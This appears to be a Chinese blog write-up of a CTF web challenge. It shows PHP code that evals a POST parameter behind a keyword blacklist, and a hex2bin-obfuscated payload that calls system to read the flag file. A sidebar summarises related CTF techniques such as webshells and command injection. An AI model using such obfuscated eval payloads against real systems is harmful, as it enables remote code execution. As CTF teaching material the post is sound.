BMZCTF_WEB_ezeval

最新推荐文章于 2025-02-04 19:28:08 发布
最新推荐文章于 2025-02-04 19:28:08 发布
阅读量260 收藏 1
点赞数 3
分类专栏: CTF 文章标签: 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_44959263/article/details/120455394
版权
该博客介绍了如何通过POST方式传递CMD参数,利用ASCII编码绕过黑名单限制,成功在BMZCTF中获取flag的过程。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

在这里插入图片描述

查看代码

<?php
highlight_file(__FILE__);
$cmd=$_POST['cmd'];
$cmd=htmlspecialchars($cmd);
$black_list=array('php','echo','`','preg','server','chr','decode','html','md5','post','get','file','session','ascii','eval','replace','assert','exec','cookie','$','include','var','print','scan','decode','system','func','ini_','passthru','pcntl','open','link','log','current','local','source','require','contents');
$cmd = str_ireplace($black_list,"BMZCTF",$cmd);
eval($cmd);

?>

post方式传输一个cmd参数,当参数等于黑名单中的字符串时,转换成BMZCTF,在这种情况下进行绕过得到flag

在这里插入图片描述
在这里插入图片描述

根据题目要求可以想到使用编码进行过滤,尝试ASSIC编码,构造payload尝试

cmd=hex2bin('73797374656d')('cat /flag');

在这里插入图片描述

成功得到flag!

二、BMZCTF-[easy_php]-[本地复现]-[简单的代码审计]
qwsn
01-01 2318
1.addslashes($string):对字符串参数中的预定义字符进行转义,并返回转义后的字符串 2.__DIR__:取出当前脚本执行的物理路径 3.PD9waHAKJExBTkdbJ21lbWJlcl9tYW5hZ2UnXSA9ICdhZG1pbic7Cj8+Cg== <?php $LANG['member_manage'] = 'admin'; ?> 4.file_get_contents — 将整个文件读入一个字符串 5.file_put_contents — 将一个字符串写入
BMZCTF hitcon_2017_ssrfme
qq_26243045的博客
11-26 722
考点:perl脚本open命令执行 打开题目显示如下代码 将GET请求到的数据保存在我们自定义的文件名当中。 给url参数传递/可以查看根目录下的内容 Perl的open函数执行会执行给open函数所传递的文件名参数中的系统命令,但是前提是这个文件名是需要存在的。 这道题因为文件名是可以控制的,所以就先生成一个以读取flag命令命名的文件 然后使用file协议去读取文件 访问即可获得flag ...
BMZCTF-WEB_ezeval
CHAWUCIREN1的博客
04-28 247
BMZCTF-WEB_ezeval 又是PHP代码审计的东西。 <?php highlight_file(__FILE__); $cmd=$_POST['cmd']; $cmd=htmlspecialchars($cmd); $black_list=array('php','echo','`','preg','server','chr','decode','html','md5','post','get','file','session','ascii','eval','replace','asser
BMZCTF Web up
qq_26243045的博客
01-14 375
打开页面。 发现没有什么有用的信息,查看源代码也一样。 于是进行目录扫描: 发现了两个页面。分别打开。 index.html 无用。 upload.html: 是一个文件上传点。 先尝试上传正常图片: 可以看到,文件的临时目录和文件上传后的存储位置。 查看上传后的文件: 可以看到,是以代码的形式显示出来,而不是图片。 也就是说我们可以上传图片马来执行命令。 上传一个php文件: 多次尝试,发现是白名单过滤。而且文件内容还会被重写。我们就想到了二次渲染。
kalmarCTF(WEB|EZ)WP
记录学习,一起进步
03-23 535
kalmarCTF(WEB|EZ)WP
[GDOUCTF 2023]EZ WEB
www.lazy.kim
02-16 637
GET向指定的URL请求资源,可携带参数(明文)。POST向指定的URL提交资源,表单数据提交,数据进行封装(比Get方法安全)。PUT与POST类似,通常用于对资源数据的更新修改。PUT是用来传输文件的,它会将文件内容包含在请求报文的主体当中,然后将内容保存到指定的uri指定的位置上,不带自身验证的功能,任何人都可以通过PUT上传文件,这样就会导致不安全的因素,所以很多网站都会禁止使用该方法。
BMZCTF baby_dsa
qq_26243045的博客
12-03 702
DSA完全不懂,现学,相关知识如下链接: https://www.jarvisw.com/?p=169 用大佬的脚本: from Crypto.Util.number import * from hashlib import sha512,md5 def hash(message): return int(sha512(message).hexdigest(), 16) def sign(message, pubkey, privkey, random1): p, q, g,...
BMZCTF Traffic_Light
qq_26243045的博客
11-29 1099
下载附件,打开后是一张gif动图。内容是一个红绿灯 对图片进行分解 得到1688张图片 观察图片: 1、发现第2的倍数的图片都是没有灯亮的。忽略不计。 2、绿灯和红灯总和为8或8的倍数时,下一张一定是黄色。 由此可以推断为二进制。绿为1,红为0,黄为空格。 写脚本进行编码: # -*-coding: utf-8 -*- from PIL import Image binstr = "" flag = "" def decode(s): return ''.join([chr(i) for
BMZCTF SDNISC2020_简单js
qq_26243045的博客
01-06 792
下载附件,是一个JS文件。内容如下: /** * Pseudo md5 hash function * @param {string} string * @param {string} method The function method, can be 'ENCRYPT' or 'DECRYPT' * @return {string} */ function pseudoHash(string, method) { // Default method is encryption if
[BMZCTF]-WEB_ezeval
cjdgg的博客
05-14 241
[BMZCTF]-WEB_ezeval 这题也是直接给出php源代码,代码也很直接,只要我们将数据绕过htmlspecialchars()和str_ireplace()就可以执行传入的cmd htmlspecialchars() 函数:htmlspecialchars() 函数把预定义的字符转换为 HTML 实体。 str_ireplace() 函数:str_ireplace() 函数替换字符串中的一些字符(不区分大小写)。 简单来说,这题考察的就是黑名单的绕过,这里直接推荐mochu大佬的文章 第
[GDOUCTF 2023]EZ WEB 学习笔记
ZhangAweio的博客
04-26 1138
其中 '/super-secret-route-nobody-will-guess' 路由返回的内容可能是敏感信息。看到题目没啥提示,说他保证flag就在附近。那我们只需要抓包、改包发送PUT请求就行了。发现了个提示的文件/src 我们打开它。我们F12查看源码看看有啥有用的东西。
XCTF系列 // Web ez题 Writeup
qq_45805420的博客
07-11 584
1`robots robots 协议也叫 robots.txt 是一种存放于网站根目录下的ASCII编码的文本文件,它用来告知搜索引擎(或网络爬虫)哪些内容能被抓取,哪些内容不能被抓取。因为一些系统中的URL是大小写敏感的,所以 robots.txt 的文件名应统一为小写。   进入本题场景,网页中什么内容也没有,不过没有关系,既然题目为 robots ,故可以先访问 robots.txt 看看。   在该页面可以看到明显的提示,故直接访问 f1ag_1s_h3re.php 页面就可以得到flag。 2`
ezsqli(GYCTF-WEB)
火柴人的博客
03-13 1184
1.知识点 SQL盲注: 布尔盲注 无列名盲注 2.分析 题目过滤了or和union,无法使用Information_Schema.Tables。 之前常用的 innodb_table_stats 和 innodb_index_stats 也无法使用。 但是我们首先需要查找flag所在的表名,这里我们参考 Alternatives to Extract Tables and Columns ...
Dest0g3 520迎新赛web&misc
weixin_63231007的博客
07-19 1980
Destog3 520迎新赛web&misc题目复现
BMZCTF WEB_ezeval
lay_breeze的博客
08-19 209
BMZCTF WEB_ezeval 记一次做题思路 <?php highlight_file(__FILE__); $cmd=$_POST['cmd']; $cmd=htmlspecialchars($cmd); $black_list=array('php','echo','`','preg','server','chr','decode','html','md5','post','get','file','session','ascii','eval','replace','assert','ex
CTFHUB-RCE-eval执行
u014794539的博客
07-11 317
考点 一句话木马 eval执行 思路分析 打开直接 <?php if (isset($_REQUEST['cmd'])) { eval($_REQUEST["cmd"]); } else { highlight_file(__FILE__); } ?> 那就直接连蚁剑了。。。。 直接找到了 得到flag ctfhub{587c0757ccda0ba89da63da0} ...
渗透测试-xss绕过和htmlspecialchars函数绕过
lza20001103的博客
04-24 5367
xss绕过和htmlspecialchars函数绕过
PHP安全防护:深度解析htmlspecialchars绕过与防御策略
最新发布
prcool的博客
02-04 1377
PHP安全防护:深度解析htmlspecialchars绕过与防御策略
【BUUCTF】 [RoarCTF 2019]Easy Calc 详细题解笔记 Writeup
algae
08-13 3103
【BUUCTF】 [RoarCTF 2019]Easy Calc一. playload1.scandir("/")函数读取目录,/ 被过滤所以换为chr(47)绕过(1).同1,但空格换为+(2).这里的chr(47)也可以换为hex2bin(dechex(47))(3).(4).(5).2.http走私绕过WAF4.5.二. 基础知识1.利用PHP的字符串解析特性Bypass2.[PHP chr() 函数:chr(ascii)](https://www.w3school.com.cn/php/func_s
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值